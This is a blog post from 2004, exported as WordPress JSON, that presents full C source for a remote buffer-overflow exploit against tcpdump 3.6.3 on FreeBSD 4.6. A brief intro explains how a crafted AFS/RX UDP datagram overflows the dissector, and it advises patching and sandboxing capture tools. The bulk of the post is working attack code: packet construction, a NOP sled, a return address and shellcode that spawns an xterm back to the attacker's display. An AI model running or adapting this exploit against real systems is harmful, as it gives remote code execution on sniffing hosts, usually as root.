{"id":149,"date":"2004-03-02T16:57:27","date_gmt":"2004-03-02T09:57:27","guid":{"rendered":""},"modified":"2004-03-02T16:57:27","modified_gmt":"2004-03-02T09:57:27","slug":"tcpdump-remote-exploit-old","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2004\/03\/tcpdump-remote-exploit-old\/","title":{"rendered":"tcpdump remote exploit (old)"},"content":{"rendered":"<p>Old remote exploit against tcpdump 3.6.3 on FreeBSD 4.6 (i386 shellcode). It sends a single UDP datagram from port 7001 to port 7000 (the AFS fileserver RX ports) carrying an AFS RPC (opcode 134) with an ACL body: the header <code>1 0<\/code>, then one entry whose name is 120 bytes of padding, ten copies of the return address <code>ADDR<\/code>, a 100-byte NOP sled and the shellcode, closed by the rights field <code> 1<\/code>. The oversized entry overflows a fixed-size buffer in tcpdump's AFS\/RX printer, the repeated <code>ADDR<\/code> lands on the saved return address, and the shellcode runs <code>\/bin\/sh -c \"\/usr\/X11R6\/bin\/xterm -ut -display &lt;display&gt;\"<\/code>, pushing an xterm back to the attacker's X server (which must accept the connection). Two things worth noting: the victim does not need to run AFS at all, tcpdump picks the RX dissector purely from the UDP ports, so anyone who can put a datagram on a segment that an old tcpdump is sniffing (normally as root) gets code execution on the sniffer, and nothing has to come back, so the source address could just as well be forged; and the return address is hard-coded for one build, the optional <code>offset<\/code> argument only nudges it. Long fixed upstream; the durable lesson is that packet dissectors parse hostile input with high privilege, so keep them current and run capture tools with privileges dropped or sandboxed.<\/p>\n<p>feed the goats!<!--more--><\/p>\n<p>  #include &lt;stdio.h&gt;<br \/>\n  #include &lt;netinet\/in.h&gt;<br \/>\n  #include &lt;sys\/types.h&gt;<br \/>\n  #include &lt;sys\/socket.h&gt;<br \/>\n  #include &lt;netdb.h&gt;<br \/>\n  #include &lt;arpa\/inet.h&gt; <\/p>\n<p>  #define ADDR            0xbffff248<br \/>\n  #define OFFSET          0<br \/>\n  #define NUM_ADDR        10<br \/>\n  #define NOP             0x90<br \/>\n  #define NUM_NOP         100 <\/p>\n<p>  #define RX_CLIENT_INITIATED   1<br \/>\n  #define RX_PACKET_TYPE_DATA   1<br \/>\n  #define FS_RX_DPORT       7000<br \/>\n  #define FS_RX_SPORT       
7001<br \/>\n  #define AFS_CALL          134 <\/p>\n<p>  struct rx_header {<br \/>\n    u_int32_t epoch;<br \/>\n    u_int32_t cid;<br \/>\n    u_int32_t callNumber;<br \/>\n    u_int32_t seq;<br \/>\n    u_int32_t serial;<br \/>\n    u_char type;<br \/>\n    u_char flags;<br \/>\n    u_char userStatus;<br \/>\n    u_char securityIndex;<br \/>\n    u_short spare;<br \/>\n    u_short serviceId;<br \/>\n  }; <\/p>\n<p>  char shellcode[] =<br \/>\n   \"\\xeb\\x57\\x5e\\xb3\\x21\\xfe\\xcb\\x88\\x5e\\x2c\\x88\\x5e\\x23\"<br \/>\n   \"\\x88\\x5e\\x1f\\x31\\xdb\\x88\\x5e\\x07\\x46\\x46\\x88\\x5e\\x08\"<br \/>\n   \"\\x4e\\x4e\\x88\\x5e\\xFF\\x89\\x5e\\xfc\\x89\\x76\\xf0\\x8d\\x5e\"<br \/>\n   \"\\x08\\x89\\x5e\\xf4\\x83\\xc3\\x03\\x89\\x5e\\xf8\\x8d\\x4e\\xf0\"<br \/>\n   \"\\x89\\xf3\\x8d\\x56\\xfc\\x31\\xc0\\xb0\\x0e\\x48\\x48\\x48\\xcd\"<br \/>\n   \"\\x80\\x31\\xc0\\x40\\x31\\xdb\\xcd\\x80\\xAA\\xAA\\xAA\\xAA\\xBB\"<br \/>\n   \"\\xBB\\xBB\\xBB\\xCC\\xCC\\xCC\\xCC\\xDD\\xDD\\xDD\\xDD\\xe8\\xa4\"<br \/>\n   \"\\xff\\xff\\xff\"<br \/>\n   \"\/bin\/shZ-cZ\/usr\/X11R6\/bin\/xtermZ-utZ-displayZ\"; <\/p>\n<p>  long resolve(char *name) {<br \/>\n   struct hostent *hp;<br \/>\n   long ip; <\/p>\n<p>   if ((ip=inet_addr(name))==-1) {<br \/>\n    if ((hp=gethostbyname(name))==NULL) {<br \/>\n      fprintf (stderr,\"Can't resolve host name [%s].\\n\",name);<br \/>\n      exit(-1);<br \/>\n     }<br \/>\n    memcpy(&#038;ip,(hp->h_addr),4);<br \/>\n    }<br \/>\n   return(ip);<br \/>\n  } <\/p>\n<p>  int main (int argc, char *argv[]) { <\/p>\n<p>   struct sockaddr_in addr,sin;<br \/>\n   int sock,aux, offset=OFFSET;<br \/>\n   char buffer[4048], *chptr;<br \/>\n   struct rx_header *rxh;<br \/>\n   
long int *lptr, return_addr=ADDR; <\/p>\n<p>   fprintf(stderr,\"Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\\n\\n\"); <\/p>\n<p>   if (argc&lt;3) {<br \/>\n    printf(\"Usage: %s [host] [display] [offset]\\n\",argv[0]);<br \/>\n    exit(-1);<br \/>\n    } <\/p>\n<p>   if (argc==4) offset=atoi(argv[3]);<br \/>\n   return_addr+=offset; <\/p>\n<p>   fprintf(stderr,\"Using return addr: %#x\\n\",return_addr); <\/p>\n<p>   addr.sin_family=AF_INET;<br \/>\n   addr.sin_addr.s_addr=resolve(argv[1]);<br \/>\n   addr.sin_port=htons(FS_RX_DPORT); <\/p>\n<p>   if ((sock=socket(AF_INET, SOCK_DGRAM,0))&lt;0) {<br \/>\n    perror(\"socket()\");<br \/>\n    exit(-1);<br \/>\n    } <\/p>\n<p>   sin.sin_family=AF_INET;<br \/>\n   sin.sin_addr.s_addr=INADDR_ANY;<br \/>\n   sin.sin_port=htons(FS_RX_SPORT); <\/p>\n<p>   if (bind(sock,(struct sockaddr*)&#038;sin,sizeof(sin))&lt;0) {<br \/>\n     perror(\"bind()\");<br \/>\n     exit(-1);<br \/>\n     } <\/p>\n<p>   memset(buffer,0,sizeof(buffer));<br \/>\n   rxh=(struct rx_header *)buffer; <\/p>\n<p>   rxh->type=RX_PACKET_TYPE_DATA;<br \/>\n   rxh->seq=htonl(1);<br \/>\n   rxh->flags=RX_CLIENT_INITIATED; <\/p>\n<p>   lptr=(long int *)(buffer+sizeof(struct rx_header));<br \/>\n   *(lptr++)=htonl(AFS_CALL);<br \/>\n   *(lptr++)=htonl(1);<br \/>\n   *(lptr++)=htonl(2);<br \/>\n   *(lptr++)=htonl(3); <\/p>\n<p>   *(lptr++)=htonl(420);<br \/>\n   chptr=(char *)lptr;<br \/>\n   sprintf(chptr,\"1 0\\n\");<br \/>\n   chptr+=4; <\/p>\n<p>   memset(chptr,'A',120);<br \/>\n   chptr+=120;<br \/>\n   lptr=(long int *)chptr;<br \/>\n   for (aux=0;aux&lt;NUM_ADDR;aux++) *(lptr++)=return_addr;<br \/>\n   chptr=(char *)lptr;<br \/>\n   memset(chptr,NOP,NUM_NOP);<br \/>\n   chptr+=NUM_NOP;<br \/>\n   shellcode[30]=(char)(46+strlen(argv[2]));<br \/>\n   memcpy(chptr,shellcode,strlen(shellcode));<br \/>\n   chptr+=strlen(shellcode);<br \/>\n   memcpy(chptr,argv[2],strlen(argv[2]));<br \/>\n   chptr+=strlen(argv[2]); <\/p>\n<p>   sprintf(chptr,\" 1\\n\"); <\/p>\n<p>   if (sendto(sock,buffer,520,0,&#038;addr,sizeof(addr))==-1) {<br \/>\n    perror(\"send()\");<br \/>\n    exit(-1);<br \/>\n    
} <\/p>\n<p>   fprintf(stderr,\"Packet Sent Waiting For Xterm!!!\\n\\n\"); <\/p>\n<p>   close(sock);<br \/>\n   return(0);<br \/>\n  } \n<\/p>\n","protected":false},"excerpt":{"rendered":"<p>old remote exploit against tcpdump. feed the goats!<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-149","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-2p","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=149"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/149\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/ta
gs?post=149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}